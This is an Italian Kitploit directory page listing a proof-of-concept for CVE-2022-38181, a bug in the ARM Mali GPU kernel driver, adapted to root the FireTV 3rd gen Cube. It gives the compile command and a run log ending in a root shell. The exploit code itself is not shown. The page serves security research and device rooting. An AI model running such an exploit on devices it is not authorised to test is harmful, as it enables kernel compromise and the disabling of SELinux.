Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE_2022_38181_Gazelle — CVE-2022-38181 POC per FireTV 3rd gen Cube (gazelle) | Kitploit
Strumenti/GitHubGitHub/pro-me3us/cve_2022_38181_gazelle
Sicurezza AndroidSicurezza Sistemi EmbeddedEscalation di PrivilegiExploitSicurezza HardwareBinary Exploitation
GitHubpro-me3us/cve_2022_38181_gazelle

CVE_2022_38181_Gazelle

CVE-2022-38181 POC per FireTV 3rd gen Cube (gazelle)

Vedi Repository
333 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit per CVE-2022-38181 da eseguire su FireTV 3rd gen Cube

Questo è un fork del POC per Pixel 6 del ricercatore di sicurezza Man Yue Mo per CVE_2022_38181. Leggi la sua dettagliata analisi della vulnerabilità qui. Sono state apportate modifiche per tenere conto dello spazio utente a 32 bit di FireOS. Il POC sfrutta un bug nel driver del kernel ARM Mali per ottenere l'esecuzione arbitraria di codice nel kernel, che viene poi utilizzata per disabilitare SELinux e ottenere i permessi di root.

Ho usato il seguente comando per compilare con clang in ndk-21:

root@kitploit:~
android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi30-clang -DSHELL mali_shrinker_mmap32.c -o gazelle_shrinker

Per una maggiore affidabilità, l'exploit dovrebbe essere eseguito 30-90 secondi dopo l'avvio del Cube.

root@kitploit:~
gazelle:/ $ /data/local/tmp/gazelle_shrinker
fingerprint: Amazon/gazelle/gazelle:9/PS7613.3701N/0025401652480:user/amz-p,release-keys
failed, retry.
failed, retry.
region freed 47
alias gpu va 100c83000
read 0
cleanup flush region
release_mem_pool
jit_freed
jit_free commit: 6 0
Found freed_idx 6
Found pgd 23, 100d30000
overwrite addr : 104100558 558
overwrite addr : 104300558 558
overwrite addr : 10410082c 82c
overwrite addr : 10430082c 82c
result 50
gazelle:/ # 
Scarica lo strumento